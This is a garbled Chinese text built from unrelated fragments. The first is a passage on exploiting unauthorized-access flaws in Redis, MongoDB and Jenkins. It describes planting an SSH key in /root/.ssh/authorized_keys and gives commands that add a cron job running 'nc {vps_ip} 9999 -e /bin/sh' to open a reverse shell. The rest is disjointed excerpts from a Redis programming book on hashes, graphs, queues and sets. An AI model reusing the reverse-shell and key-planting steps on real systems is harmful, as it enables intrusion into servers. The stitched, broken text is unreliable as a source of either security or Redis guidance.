命令，可以进行写文件 操作，攻击者可以成功将自己的ssh公钥写入目标服务器的 /root/.ssh 文件夹的authotrized_keys 文件 中，进而可以使用对应私钥直接使用ssh服务登录目标服务器、添加计划任务、写入Webshell等操作。 漏洞利用 环境介绍 环境搭建 常见的未授权访问漏洞： Redis 未授权访问漏洞 MongoDB 未授权访问漏洞 Jenkins 未授权访问漏洞 -it a8ff7ed880fb sh # 进入容器 echo '* * * * * /usr/bin/nc {vps_ip} 9999 -e /bin/sh' >> /tmp/root #添加计划任务 cat /tmp/root # 查看/tmp/root 文件 exit #退出容器 反弹宿主机shell 还有其他比如写入ssh公钥等利用方式，方式方法都是大同小异的，这里就不再介绍了。

量。 版本要求 HKEYS 命令、 HVALS 命令和 HGETALL 命令都从 Redis 2.0.0 版本开始可⽤。 3.17 示例：储存图数据 在构建地图应⽤、设计电路图、进⾏任务调度、分析⽹络流量等多种任务中， 都需要对图（graph）数据结构实施 建模， 并储存相关的图数据。 对于不少数据库来说， 想要⾼效直观地储存图数据并不是⼀件容易的事情， 但是 Redis 却能够以多种不同的⽅式表示图数据结构， 那么⽤户可能就需要等待⼀段较⻓的时间才能看到 ui_print() 函数打印出的反馈信息。 为了解决这个问题， 在执⾏ send_validate_email() 函数的时候， 我们可以不⽴即执⾏邮件发送操作， ⽽是将邮 件发送任务放⼊到⼀个队列⾥⾯， 然后由后台的线程负责实际执⾏。 这样的话， 程序只需要执⾏⼀个⼊队操作， 然后就可以直接向⽤户反馈注册结果了， 这⽐实际地发送邮件之后再向⽤户反馈结果要快得多。 代码清单 4-4 ⽽不要每次都重复进⾏计算。 此外， 当集合计算涉及的元素数量⾮常巨⼤时， Redis 服务器在进⾏计算时可能会被阻塞。 这时， 我们可以 考虑使⽤ Redis 的复制功能， 通过从服务器来执⾏集合计算任务， 从⽽确保主服务器可以继续处理其他客户端 发送的命令请求。 本书将在之后的《复制》⼀章中对 Redis 的复制功能进⾏介绍。 5.18 示例：共同关注与推荐关注 在前⾯的内容中， 我们学习了如何使⽤集合去储存社交⽹站的好友关系，